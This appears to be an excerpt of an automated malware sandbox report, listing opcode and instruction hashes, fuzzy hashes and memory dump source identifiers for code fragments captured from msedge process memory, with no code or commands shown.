                                            • Opcode ID: a1a0a3c75a5309d39a97e9023762a8289282a698f716c21033f3cb28e6e6ab3c
                                            • Instruction ID: 0f470fe0e84c2927f563b94676e62346c0ddea732254d9f8cba5c9045d62bd2e
                                            • Opcode Fuzzy Hash: a1a0a3c75a5309d39a97e9023762a8289282a698f716c21033f3cb28e6e6ab3c
                                            • Instruction Fuzzy Hash: 1131D120B5870A4FD715FBD8E0BA6AA3F62FF98204BC085A5D44DC338ADD346882CB55
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef12ebb75a54744c92ade191fdf133938a512d26874fec0bf3360503fe140539
                                            • Instruction ID: ec34bfb6fc4b0c9f469ed9d165435dee2399b4aa13f5967819f858c1dc29d0bd
                                            • Opcode Fuzzy Hash: ef12ebb75a54744c92ade191fdf133938a512d26874fec0bf3360503fe140539
                                            • Instruction Fuzzy Hash: 26014752A0CBD50EF781AF3858A10F13FE09BD2260B1806BBE48CC60E7D94869428352
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4827baa710db57f498913afa4818607e7425d135799ba16f48aeff8c9dc1025d
                                            • Instruction ID: 0005e4048dea5f2a832e1ca084cd9724fc7cf9e5e3658248a3b80a749edf4d79
                                            • Opcode Fuzzy Hash: 4827baa710db57f498913afa4818607e7425d135799ba16f48aeff8c9dc1025d
                                            • Instruction Fuzzy Hash: 8352C571B18A594FEBA4EB7884B93B9B7D2FF99300F44457DE04EC32D6DE28A8018741
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f803c3f176070ca56a7a3023373b10ae51653b3a9c54642d318a0e59b819439
                                            • Instruction ID: 391b21d5e184ae3422905d9aa600174e17229480fd0732ec5926a0d623d5bdac
                                            • Opcode Fuzzy Hash: 9f803c3f176070ca56a7a3023373b10ae51653b3a9c54642d318a0e59b819439
                                            • Instruction Fuzzy Hash: 2351FF21B1E6C90FE796ABB858752B5BFD1DF87216B0844FFE0C9C62A3DD185806C342
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03d5c0e888b861e0c45a2e2fd2cca741f98e72cb745855d2253ba9c154e75341
                                            • Instruction ID: 9a819a50aae2359102ffc099d34c37e7db41c12fb0247c885e90706bd3d8f784
                                            • Opcode Fuzzy Hash: 03d5c0e888b861e0c45a2e2fd2cca741f98e72cb745855d2253ba9c154e75341
                                            • Instruction Fuzzy Hash: 97913721B0DB9A0FE756AB7C88B51F97FE1EF86210B0440BBD189C7293DD1CA8468361
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa0e656c65fd8fdb1075955ad3ee4aacf31a02355dce0823376c478100fc54f7
                                            • Instruction ID: bd8d51f979ccc0b1204df4d71458ca0014fe944570256ea1734c4a3a40a90857
                                            • Opcode Fuzzy Hash: fa0e656c65fd8fdb1075955ad3ee4aacf31a02355dce0823376c478100fc54f7
                                            • Instruction Fuzzy Hash: 7C31A821B1D9490FE798FA6C986A2B9B7C2EF99356F0405BFE04EC3393DD689C018341
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aaaaa10bf4db1411733e8db9eaf10f3afebd011010e1b4b4389c1be5a20a251f
                                            • Instruction ID: 4e262da951acd837b8c24c2cd531908c848b2b5e4c688312abb4ec0d5622bf68
                                            • Opcode Fuzzy Hash: aaaaa10bf4db1411733e8db9eaf10f3afebd011010e1b4b4389c1be5a20a251f
                                            • Instruction Fuzzy Hash: 46310621B18E594FE794BBFC88693BEBAD1EFA8701F04417EE00DC3293DD28A9018751
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a18f4716483321e93ad589200d52b25e20ff27994f300520cb2a447e0af25fc
                                            • Instruction ID: 66d58a45310d9b1ceed5aa294a111855a0bb2100fc68468a4da138932df81280
                                            • Opcode Fuzzy Hash: 4a18f4716483321e93ad589200d52b25e20ff27994f300520cb2a447e0af25fc
                                            • Instruction Fuzzy Hash: 22419371F18A1E4FEB45EBA8C8756EABBE1FF98300F544579D109D3286CE38A801C750
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 391669899ef18abfbc0f381f84d3f2808890c3e7b8ad179a6d6a7657c1a5a642
                                            • Instruction ID: 4b229a6ca37745f34e04aa24d4c2864b0e50fd5ec4b05045cf7a4710b0962edd
                                            • Opcode Fuzzy Hash: 391669899ef18abfbc0f381f84d3f2808890c3e7b8ad179a6d6a7657c1a5a642
                                            • Instruction Fuzzy Hash: C031E425B5970E5BD751EBECD0B99EABB61FF98319F804078D14DC3386DE246801CB91
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b89682f59f1d62604c1024fc842a227781daaace80ea870c895f6893d99c7687
                                            • Instruction ID: fc6ffcb795c56acd8941cca14fd24fc828062f13e795e80e9361887d591bc17a
                                            • Opcode Fuzzy Hash: b89682f59f1d62604c1024fc842a227781daaace80ea870c895f6893d99c7687
                                            • Instruction Fuzzy Hash: B1318024B9974E5FD752EBACD0B8AA9BF71EF98305F8044A9D44EC3386DE246900CB51
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b98a4402bec13af0469c98423c6d4bf44b65c9f957fefa0d832f17cd0a53a4e4
                                            • Instruction ID: 6052b4fe38eb4e78b323f9099acde4c22a5a1e77af532e305edcfbaa2c08c4ef
                                            • Opcode Fuzzy Hash: b98a4402bec13af0469c98423c6d4bf44b65c9f957fefa0d832f17cd0a53a4e4
                                            • Instruction Fuzzy Hash: AD014751E0CBD00EE751AB385CB10A57FE09BD3220B0845ABD888C62E3DA0CAA459342